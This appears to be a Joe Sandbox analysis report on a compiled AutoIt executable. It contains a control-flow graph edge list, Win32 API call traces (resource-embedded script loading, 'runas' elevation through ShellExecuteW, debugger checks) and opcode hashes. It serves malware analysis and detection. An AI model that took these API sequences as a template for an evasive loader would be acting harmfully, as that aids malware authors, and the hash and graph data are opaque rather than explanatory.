97232->97234 97235 774fca 97232->97235 97233->97232 97234->97235 97235->96929 97237 777faf 59 API calls 97236->97237 97238 777b5d 97237->97238 97238->97118 97288 774d61 97239->97288 97242 774d61 2 API calls 97245 774d3a 97242->97245 97243 774d53 97246 7953cb 97243->97246 97244 774d4a FreeLibrary 97244->97243 97245->97243 97245->97244 97292 7953e0 97246->97292 97248 774f5c 97248->97133 97248->97134 97450 774d94 97249->97450 97252 774ced 97254 774cff FreeLibrary 97252->97254 97255 774d08 97252->97255 97253 774d94 2 API calls 97253->97252 97254->97255 97256 774dd0 97255->97256 97257 790f36 Mailbox 59 API calls 97256->97257 97258 774de5 97257->97258 97259 77538e 59 API calls 97258->97259 97260 774df1 _memmove 97259->97260 97261 774e2c 97260->97261 97263 774f21 97260->97263 97264 774ee9 97260->97264 97262 775027 69 API calls 97261->97262 97271 774e35 97262->97271 97465 7d99c4 95 API calls 97263->97465 97454 774fe9 CreateStreamOnHGlobal 97264->97454 97267 77506b 74 API calls 97267->97271 97269 774ec9 97269->97142 97270 7adc00 97272 775045 85 API calls 97270->97272 97271->97267 97271->97269 97271->97270 97460 775045 97271->97460 97273 7adc14 97272->97273 97274 77506b 74 API calls 97273->97274 97274->97269 97276 77507d 97275->97276 97277 7add26 97275->97277 97489 795752 97276->97489 97280 7d91b2 97687 7d9008 97280->97687 97282 7d91c8 97282->97149 97284 775036 97283->97284 97285 7adce9 97283->97285 97692 795dd0 97284->97692 97287 77503e 97287->97151 97289 774d2e 97288->97289 97290 774d6a LoadLibraryA 97288->97290 97289->97242 97289->97245 97290->97289 97291 774d7b GetProcAddress 97290->97291 97291->97289 97294 7953ec __setmbcp 97292->97294 97293 7953ff 97341 798ca8 58 API calls __getptd_noexit 97293->97341 97294->97293 97297 795430 97294->97297 97296 795404 97342 798f36 9 API calls _wprintf 97296->97342 97311 7a0668 97297->97311 97300 795435 97301 79544b 97300->97301 97302 79543e 97300->97302 97304 795475 97301->97304 97305 795455 97301->97305 97343 798ca8 58 API calls 
__getptd_noexit 97302->97343 97326 7a0787 97304->97326 97344 798ca8 58 API calls __getptd_noexit 97305->97344 97307 79540f @_EH4_CallFilterFunc@8 __setmbcp 97307->97248 97312 7a0674 __setmbcp 97311->97312 97313 799d8b __lock 58 API calls 97312->97313 97323 7a0682 97313->97323 97314 7a06fd 97351 79899d 58 API calls 2 library calls 97314->97351 97317 7a0704 97324 7a06f6 97317->97324 97352 799fab InitializeCriticalSectionAndSpinCount 97317->97352 97318 7a0773 __setmbcp 97318->97300 97320 799e13 __mtinitlocknum 58 API calls 97320->97323 97322 7a072a EnterCriticalSection 97322->97324 97323->97314 97323->97320 97323->97324 97349 796dcd 59 API calls __lock 97323->97349 97350 796e37 LeaveCriticalSection LeaveCriticalSection _doexit 97323->97350 97346 7a077e 97324->97346 97327 7a07a7 __wopenfile 97326->97327 97328 7a07c1 97327->97328 97340 7a097c 97327->97340 97359 79394b 60 API calls 3 library calls 97327->97359 97357 798ca8 58 API calls __getptd_noexit 97328->97357 97330 7a07c6 97358 798f36 9 API calls _wprintf 97330->97358 97332 795480 97345 7954a2 LeaveCriticalSection LeaveCriticalSection _fseek 97332->97345 97333 7a09df 97354 7a8721 97333->97354 97336 7a0975 97336->97340 97360 79394b 60 API calls 3 library calls 97336->97360 97338 7a0994 97338->97340 97361 79394b 60 API calls 3 library calls 97338->97361 97340->97328 97340->97333 97341->97296 97342->97307 97343->97307 97344->97307 97345->97307 97353 799ef5 LeaveCriticalSection 97346->97353 97348 7a0785 97348->97318 97349->97323 97350->97323 97351->97317 97352->97322 97353->97348 97362 7a7f05 97354->97362 97356 7a873a 97356->97332 97357->97330 97358->97332 97359->97336 97360->97338 97361->97340 97363 7a7f11 __setmbcp 97362->97363 97364 7a7f27 97363->97364 97367 7a7f5d 97363->97367 97447 798ca8 58 API calls __getptd_noexit 97364->97447 97366 7a7f2c 97448 798f36 9 API calls _wprintf 97366->97448 97373 7a7fce 97367->97373 97370 7a7f79 97449 7a7fa2 LeaveCriticalSection __unlock_fhandle 97370->97449 97372 7a7f36 __setmbcp 
97372->97356 97374 7a7fee 97373->97374 97375 79465a __wsopen_nolock 58 API calls 97374->97375 97378 7a800a 97375->97378 97376 798f46 __invoke_watson 8 API calls 97377 7a8720 97376->97377 97379 7a7f05 __wsopen_helper 103 API calls 97377->97379 97380 7a8044 97378->97380 97386 7a8067 97378->97386 97395 7a8141 97378->97395 97381 7a873a 97379->97381 97382 798c74 __read 58 API calls 97380->97382 97381->97370 97383 7a8049 97382->97383 97384 798ca8 __setmbcp 58 API calls 97383->97384 97385 7a8056 97384->97385 97388 798f36 _wprintf 9 API calls 97385->97388 97387 7a8125 97386->97387 97389 7a8103 97386->97389 97390 798c74 __read 58 API calls 97387->97390 97415 7a8060 97388->97415 97396 79d414 __alloc_osfhnd 61 API calls 97389->97396 97391 7a812a 97390->97391 97392 798ca8 __setmbcp 58 API calls 97391->97392 97393 7a8137 97392->97393 97394 798f36 _wprintf 9 API calls 97393->97394 97394->97395 97395->97376 97397 7a81d1 97396->97397 97398 7a81db 97397->97398 97399 7a81fe 97397->97399 97400 798c74 __read 58 API calls 97398->97400 97401 7a7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97399->97401 97402 7a81e0 97400->97402 97409 7a8220 97401->97409 97404 798ca8 __setmbcp 58 API calls 97402->97404 97403 7a829e GetFileType 97407 7a82eb 97403->97407 97408 7a82a9 GetLastError 97403->97408 97406 7a81ea 97404->97406 97405 7a826c GetLastError 97410 798c87 __dosmaperr 58 API calls 97405->97410 97411 798ca8 __setmbcp 58 API calls 97406->97411 97419 79d6aa __set_osfhnd 59 API calls 97407->97419 97412 798c87 __dosmaperr 58 API calls 97408->97412 97409->97403 97409->97405 97413 7a7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97409->97413 97414 7a8291 97410->97414 97411->97415 97416 7a82d0 CloseHandle 97412->97416 97418 7a8261 97413->97418 97421 798ca8 __setmbcp 58 API calls 97414->97421 97415->97370 97416->97414 97417 7a82de 97416->97417 97420 798ca8 __setmbcp 58 API calls 97417->97420 97418->97403 97418->97405 97424 7a8309 97419->97424 97422 7a82e3 
97420->97422 97421->97395 97422->97414 97423 7a84c4 97423->97395 97426 7a8697 CloseHandle 97423->97426 97424->97423 97425 7a1a41 __lseeki64_nolock 60 API calls 97424->97425 97442 7a838a 97424->97442 97427 7a8373 97425->97427 97428 7a7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97426->97428 97429 798c74 __read 58 API calls 97427->97429 97427->97442 97430 7a86be 97428->97430 97429->97442 97431 7a86f2 97430->97431 97432 7a86c6 GetLastError 97430->97432 97431->97395 97433 798c87 __dosmaperr 58 API calls 97432->97433 97434 7a86d2 97433->97434 97438 79d5bd __free_osfhnd 59 API calls 97434->97438 97435 7a0c5d __close_nolock 61 API calls 97435->97442 97436 7a0fdb 70 API calls __read_nolock 97436->97442 97437 7a83bc 97439 7a9922 __chsize_nolock 82 API calls 97437->97439 97437->97442 97438->97431 97439->97437 97440 79da06 __write 78 API calls 97440->97442 97441 7a8541 97443 7a0c5d __close_nolock 61 API calls 97441->97443 97442->97423 97442->97435 97442->97436 97442->97437 97442->97440 97442->97441 97445 7a1a41 60 API calls __lseeki64_nolock 97442->97445 97444 7a8548 97443->97444 97446 798ca8 __setmbcp 58 API calls 97444->97446 97445->97442 97446->97395 97447->97366 97448->97372 97449->97372 97451 774ce1 97450->97451 97452 774d9d LoadLibraryA 97450->97452 97451->97252 97451->97253 97452->97451 97453 774dae GetProcAddress 97452->97453 97453->97451 97455 775003 FindResourceExW 97454->97455 97459 775020 97454->97459 97456 7adc8c LoadResource 97455->97456 97455->97459 97457 7adca1 SizeofResource 97456->97457 97456->97459 97458 7adcb5 LockResource 97457->97458 97457->97459 97458->97459 97459->97261 97461 775054 97460->97461 97462 7add04 97460->97462 97466 7959bd 97461->97466 97464 775062 97464->97271 97465->97261 97467 7959c9 __setmbcp 97466->97467 97468 7959db 97467->97468 97470 795a01 97467->97470 97479 798ca8 58 API calls __getptd_noexit 97468->97479 97481 796d8e 97470->97481 97471 7959e0 97480 798f36 9 API calls _wprintf 97471->97480 97474 795a07 97487 79592e 
83 API calls 5 library calls 97474->97487 97476 795a16 97488 795a38 LeaveCriticalSection LeaveCriticalSection _fseek 97476->97488 97478 7959eb __setmbcp 97478->97464 97479->97471 97480->97478 97482 796d9e 97481->97482 97483 796dc0 EnterCriticalSection 97481->97483 97482->97483 97484 796da6 97482->97484 97485 796db6 97483->97485 97486 799d8b __lock 58 API calls 97484->97486 97485->97474 97486->97485 97487->97476 97488->97478 97492 79576d 97489->97492 97491 77508e 97491->97280 97493 795779 __setmbcp 97492->97493 97494 7957b4 __setmbcp 97493->97494 97495 7957bc 97493->97495 97496 79578f _memset 97493->97496 97494->97491 97497 796d8e __lock_file 59 API calls 97495->97497 97519 798ca8 58 API calls __getptd_noexit 97496->97519 97498 7957c2 97497->97498 97505 79558d 97498->97505 97501 7957a9 97520 798f36 9 API calls _wprintf 97501->97520 97507 7955a8 _memset 97505->97507 97512 7955c3 97505->97512 97506 7955b3 97617 798ca8 58 API calls __getptd_noexit 97506->97617 97507->97506 97507->97512 97514 795603 97507->97514 97509 7955b8 97618 798f36 9 API calls _wprintf 97509->97618 97521 7957f6 LeaveCriticalSection LeaveCriticalSection _fseek 97512->97521 97513 795714 _memset 97620 798ca8 58 API calls __getptd_noexit 97513->97620 97514->97512 97514->97513 97522 794856 97514->97522 97529 7a0fdb 97514->97529 97597 7a0d27 97514->97597 97619 7a0e48 58 API calls 4 library calls 97514->97619 97519->97501 97520->97494 97521->97494 97523 794860 97522->97523 97524 794875 97522->97524 97621 798ca8 58 API calls __getptd_noexit 97523->97621 97524->97514 97526 794865 97622 798f36 9 API calls _wprintf 97526->97622 97528 794870 97528->97514 97530 7a0ffc 97529->97530 97531 7a1013 97529->97531 97632 798c74 58 API calls __getptd_noexit 97530->97632 97533 7a174b 97531->97533 97538 7a104d 97531->97538 97648 798c74 58 API calls __getptd_noexit 97533->97648 97535 7a1001 97633 798ca8 58 API calls __getptd_noexit 97535->97633 97536 7a1750 97649 798ca8 58 API calls __getptd_noexit 97536->97649 97540 
7a1055 97538->97540 97546 7a106c 97538->97546 97634 798c74 58 API calls __getptd_noexit 97540->97634 97541 7a1061 97650 798f36 9 API calls _wprintf 97541->97650 97542 7a1008 97542->97514 97544 7a105a 97635 798ca8 58 API calls __getptd_noexit 97544->97635 97546->97542 97547 7a1081 97546->97547 97550 7a109b 97546->97550 97552 7a10b9 97546->97552 97636 798c74 58 API calls __getptd_noexit 97547->97636 97550->97547 97551 7a10a6 97550->97551 97623 7a5deb 97551->97623 97637 79899d 58 API calls 2 library calls 97552->97637 97554 7a10c9 97556 7a10ec 97554->97556 97557 7a10d1 97554->97557 97640 7a1a41 60 API calls 3 library calls 97556->97640 97638 798ca8 58 API calls __getptd_noexit 97557->97638 97558 7a11ba 97560 7a1233 ReadFile 97558->97560 97565 7a11d0 GetConsoleMode 97558->97565 97563 7a1713 GetLastError 97560->97563 97564 7a1255 97560->97564 97562 7a10d6 97639 798c74 58 API calls __getptd_noexit 97562->97639 97567 7a1720 97563->97567 97573 7a1213 97563->97573 97564->97563 97571 7a1225 97564->97571 97568 7a1230 97565->97568 97569 7a11e4 97565->97569 97646 798ca8 58 API calls __getptd_noexit 97567->97646 97568->97560 97569->97568 97572 7a11ea ReadConsoleW 97569->97572 97579 7a14f7 97571->97579 97580 7a1219 97571->97580 97582 7a128a 97571->97582 97572->97571 97575 7a120d GetLastError 97572->97575 97573->97580 97641 798c87 58 API calls 3 library calls 97573->97641 97574 7a1725 97647 798c74 58 API calls __getptd_noexit 97574->97647 97575->97573 97578 792ed5 _free 58 API calls 97578->97542 97579->97580 97587 7a15fd ReadFile 97579->97587 97580->97542 97580->97578 97583 7a12f6 ReadFile 97582->97583 97588 7a1377 97582->97588 97584 7a1317 GetLastError 97583->97584 97595 7a1321 97583->97595 97584->97595 97585 7a1434 97591 7a13e4 MultiByteToWideChar 97585->97591 97644 7a1a41 60 API calls 3 library calls 97585->97644 97586 7a1424 97643 798ca8 58 API calls __getptd_noexit 97586->97643 97590 7a1620 GetLastError 97587->97590 97596 7a162e 97587->97596 97588->97580 97588->97585 
97588->97586 97588->97591 97590->97596 97591->97575 97591->97580 97595->97582 97642 7a1a41 60 API calls 3 library calls 97595->97642 97596->97579 97645 7a1a41 60 API calls 3 library calls 97596->97645 97598 7a0d32 97597->97598 97602 7a0d47 97597->97602 97684 798ca8 58 API calls __getptd_noexit 97598->97684 97600 7a0d37 97685 798f36 9 API calls _wprintf 97600->97685 97603 7a0d7c 97602->97603 97609 7a0d42 97602->97609 97686 7a6164 58 API calls __malloc_crt 97602->97686 97605 794856 __flsbuf 58 API calls 97603->97605 97606 7a0d90 97605->97606 97651 7a0ec7 97606->97651 97608 7a0d97 97608->97609 97610 794856 __flsbuf 58 API calls 97608->97610 97609->97514 97611 7a0dba 97610->97611 97611->97609 97612 794856 __flsbuf 58 API calls 97611->97612 97613 7a0dc6 97612->97613 97613->97609 97614 794856 __flsbuf 58 API calls 97613->97614 97615 7a0dd3 97614->97615 97616 794856 __flsbuf 58 API calls 97615->97616 97616->97609 97617->97509 97618->97512 97619->97514 97620->97509 97621->97526 97622->97528 97624 7a5e03 97623->97624 97625 7a5df6 97623->97625 97628 7a5e0f 97624->97628 97629 798ca8 __setmbcp 58 API calls 97624->97629 97626 798ca8 __setmbcp 58 API calls 97625->97626 97627 7a5dfb 97626->97627 97627->97558 97628->97558 97630 7a5e30 97629->97630 97631 798f36 _wprintf 9 API calls 97630->97631 97631->97627 97632->97535 97633->97542 97634->97544 97635->97541 97636->97544 97637->97554 97638->97562 97639->97542 97640->97551 97641->97580 97642->97595 97643->97580 97644->97591 97645->97596 97646->97574 97647->97580 97648->97536 97649->97541 97650->97542 97652 7a0ed3 __setmbcp 97651->97652 97653 7a0ee0 97652->97653 97654 7a0ef7 97652->97654 97656 798c74 __read 58 API calls 97653->97656 97655 7a0fbb 97654->97655 97657 7a0f0b 97654->97657 97658 798c74 __read 58 API calls 97655->97658 97659 7a0ee5 97656->97659 97660 7a0f29 97657->97660 97661 7a0f36 97657->97661 97662 7a0f2e 97658->97662 97663 798ca8 __setmbcp 58 API calls 97659->97663 97664 798c74 __read 58 API calls 97660->97664 97665 
7a0f58 97661->97665 97666 7a0f43 97661->97666 97669 798ca8 __setmbcp 58 API calls 97662->97669 97678 7a0eec __setmbcp 97663->97678 97664->97662 97668 79d386 ___lock_fhandle 59 API calls 97665->97668 97667 798c74 __read 58 API calls 97666->97667 97670 7a0f48 97667->97670 97671 7a0f5e 97668->97671 97672 7a0f50 97669->97672 97673 798ca8 __setmbcp 58 API calls 97670->97673 97674 7a0f71 97671->97674 97675 7a0f84 97671->97675 97676 798f36 _wprintf 9 API calls 97672->97676 97673->97672 97679 7a0fdb __read_nolock 70 API calls 97674->97679 97677 798ca8 __setmbcp 58 API calls 97675->97677 97676->97678 97681 7a0f89 97677->97681 97678->97608 97680 7a0f7d 97679->97680 97683 7a0fb3 __read LeaveCriticalSection 97680->97683 97682 798c74 __read 58 API calls 97681->97682 97682->97680 97683->97678 97684->97600 97685->97609 97686->97603 97690 79537a GetSystemTimeAsFileTime 97687->97690 97689 7d9017 97689->97282 97691 7953a8 __aulldiv 97690->97691 97691->97689 97693 795ddc __setmbcp 97692->97693 97694 795dee 97693->97694 97695 795e03 97693->97695 97706 798ca8 58 API calls __getptd_noexit 97694->97706 97697 796d8e __lock_file 59 API calls 97695->97697 97699 795e09 97697->97699 97698 795df3 97707 798f36 9 API calls _wprintf 97698->97707 97708 795a40 67 API calls 7 library calls 97699->97708 97702 795dfe __setmbcp 97702->97287 97703 795e14 97709 795e34 LeaveCriticalSection LeaveCriticalSection _fseek 97703->97709 97705 795e26 97705->97702 97706->97698 97707->97702 97708->97703 97709->97705 97710->97156 97711->97171 97712->97173 97713->97170 97714->97179 97716 7792c9 Mailbox 97715->97716 97717 7af4f8 97716->97717 97722 7792d3 97716->97722 97719 790f36 Mailbox 59 API calls 97717->97719 97718 7792da 97718->97183 97720 7af504 97719->97720 97722->97718 97723 779df0 59 API calls Mailbox 97722->97723 97723->97722 97724->97194 97725->97189 97731 7d97f1 __tzset_nolock _wcscmp 97726->97731 97727 77506b 74 API calls 97727->97731 97728 7d9685 97728->97200 97728->97228 97729 7d91b2 
                                                • Control-flow graph edge list (node identifiers, call edges and per-node API call counts) not rendered here. Win32 APIs referenced in the graph: GetSystemTimeAsFileTime, GetLongPathNameW, CreateFileW, ReadFile, WriteFile, SetFilePointerEx, CloseHandle, GetLastError, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, CharUpperBuffW; CRT internals referenced include __fcloseall, _free, _memmove, _wprintf, __write_nolock, __lseek_nolock, __setmbcp and __getptd_noexit.

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00773B7A
                                                • IsDebuggerPresent.KERNEL32 ref: 00773B8C
                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,008352F8,008352E0,?,?), ref: 00773BFD
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                  • Part of subcall function 00780A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00773C26,008352F8,?,?,?), ref: 00780ACE
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00773C81
                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00827770,00000010), ref: 007AD3EC
                                                • SetCurrentDirectoryW.KERNEL32(?,008352F8,?,?,?), ref: 007AD424
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00824260,008352F8,?,?,?), ref: 007AD4AA
                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 007AD4B1
                                                  • Part of subcall function 00773A58: GetSysColorBrush.USER32(0000000F), ref: 00773A62
                                                  • Part of subcall function 00773A58: LoadCursorW.USER32(00000000,00007F00), ref: 00773A71
                                                  • Part of subcall function 00773A58: LoadIconW.USER32(00000063), ref: 00773A88
                                                  • Part of subcall function 00773A58: LoadIconW.USER32(000000A4), ref: 00773A9A
                                                  • Part of subcall function 00773A58: LoadIconW.USER32(000000A2), ref: 00773AAC
                                                  • Part of subcall function 00773A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00773AD2
                                                  • Part of subcall function 00773A58: RegisterClassExW.USER32(?), ref: 00773B28
                                                  • Part of subcall function 007739E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00773A15
                                                  • Part of subcall function 007739E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00773A36
                                                  • Part of subcall function 007739E7: ShowWindow.USER32(00000000,?,?), ref: 00773A4A
                                                  • Part of subcall function 007739E7: ShowWindow.USER32(00000000,?,?), ref: 00773A53
                                                  • Part of subcall function 007743DB: _memset.LIBCMT ref: 00774401
                                                  • Part of subcall function 007743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007744A6
                                                Strings
                                                • runas, xrefs: 007AD4A5
                                                • This is a third-party compiled AutoIt script., xrefs: 007AD3E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                • API String ID: 529118366-3287110873
                                                • Opcode ID: 8453ce6bc98b3b2df68c0f846a0e5a09722e486d5f63e43740710017d012c7fc
                                                • Instruction ID: f7ad32933c17f6b4cb9ef260252ae5c191948f2a2bfa390512a305fb7a5ff8b5
                                                • Opcode Fuzzy Hash: 8453ce6bc98b3b2df68c0f846a0e5a09722e486d5f63e43740710017d012c7fc
                                                • Instruction Fuzzy Hash: C4510630904248EACF15EBB4DC09AFE7B74FF85780F00C165F859A22A1DA7C4A45DB61

Control-flow Graph
                                                APIs
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00774EEE,?,?,00000000,00000000), ref: 00774FF9
                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00774EEE,?,?,00000000,00000000), ref: 00775010
                                                • LoadResource.KERNEL32(?,00000000,?,?,00774EEE,?,?,00000000,00000000,?,?,?,?,?,?,00774F8F), ref: 007ADC90
                                                • SizeofResource.KERNEL32(?,00000000,?,?,00774EEE,?,?,00000000,00000000,?,?,?,?,?,?,00774F8F), ref: 007ADCA5
                                                • LockResource.KERNEL32(Nw,?,?,00774EEE,?,?,00000000,00000000,?,?,?,?,?,?,00774F8F,00000000), ref: 007ADCB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT$Nw
                                                • API String ID: 3051347437-742608515
                                                • Opcode ID: 2419ad31a08593ece3294807ded8081c521e7ecffe8bba85d21c834c1749d9a1
                                                • Instruction ID: c6ace4f5d66cde17382a7f47fca7de0efc340fb677858fce724f99626881a18b
                                                • Opcode Fuzzy Hash: 2419ad31a08593ece3294807ded8081c521e7ecffe8bba85d21c834c1749d9a1
                                                • Instruction Fuzzy Hash: B1115A75200700AFDB218B65DC48F6B7BB9FFC9B51F208168F40AC62A0DBA5EC00C6A4

Control-flow Graph
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00774B2B
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • GetCurrentProcess.KERNEL32(?,007FFAEC,00000000,00000000,?), ref: 00774BF8
                                                • IsWow64Process.KERNEL32(00000000), ref: 00774BFF
                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00774C45
                                                • FreeLibrary.KERNEL32(00000000), ref: 00774C50
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00774C81
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00774C8D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                • String ID:
                                                • API String ID: 1986165174-0
                                                • Opcode ID: 746fd6b68c42a4f66b885bf0bb581d097cd2f64980362be5bcc3e98c51accef8
                                                • Instruction ID: 4d9f728f13dce0ad75931f54e3ecba398d66495cb4e91fec5266121ece145889
                                                • Opcode Fuzzy Hash: 746fd6b68c42a4f66b885bf0bb581d097cd2f64980362be5bcc3e98c51accef8
                                                • Instruction Fuzzy Hash: 7B91D67154A7C4DECB31CB6884511AAFFE5AF6A300B488A9DD0CF83A51D728ED08C729
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,007AE6F1), ref: 007D44AB
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 007D44BC
                                                • FindClose.KERNEL32(00000000), ref: 007D44CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: fc37707d2e6f3b5d28b4091d5e26b86b617f74e429ebe42ace0b5d13939df50f
                                                • Instruction ID: 48251d1c03a3c0904f96d14c7ced3b986c3daed4be211a3708110ed008278c37
                                                • Opcode Fuzzy Hash: fc37707d2e6f3b5d28b4091d5e26b86b617f74e429ebe42ace0b5d13939df50f
                                                • Instruction Fuzzy Hash: 04E0DF328108006B8620A738EC4D8FE77ACAE05335F148726F935C22E0EF7C9990C69A
                                                Strings
                                                • Variable must be of type 'Object'., xrefs: 007B41BB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Variable must be of type 'Object'.
                                                • API String ID: 0-109567571
                                                • Opcode ID: dd56e2310d47cd5b40a2e82b3066449504a924ae9464d1b236a89a2f9b2307a7
                                                • Instruction ID: eb0c42840edda1748d6d17c273ca4312b2b7796ceb73d2cdba803d622073962f
                                                • Opcode Fuzzy Hash: dd56e2310d47cd5b40a2e82b3066449504a924ae9464d1b236a89a2f9b2307a7
                                                • Instruction Fuzzy Hash: 95A27B75A00205DBCF24CF58C484AAEB7B1FF58354F24C5A9E909AB352D739ED82CB91
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00780BBB
                                                • timeGetTime.WINMM ref: 00780E76
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00780FB3
                                                • Sleep.KERNEL32(0000000A), ref: 00780FC1
                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 0078105A
                                                • DestroyWindow.USER32 ref: 00781066
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00781080
                                                • Sleep.KERNEL32(0000000A,?,?), ref: 007B51DC
                                                • TranslateMessage.USER32(?), ref: 007B5FB9
                                                • DispatchMessageW.USER32(?), ref: 007B5FC7
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007B5FDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                • API String ID: 4212290369-3242690629
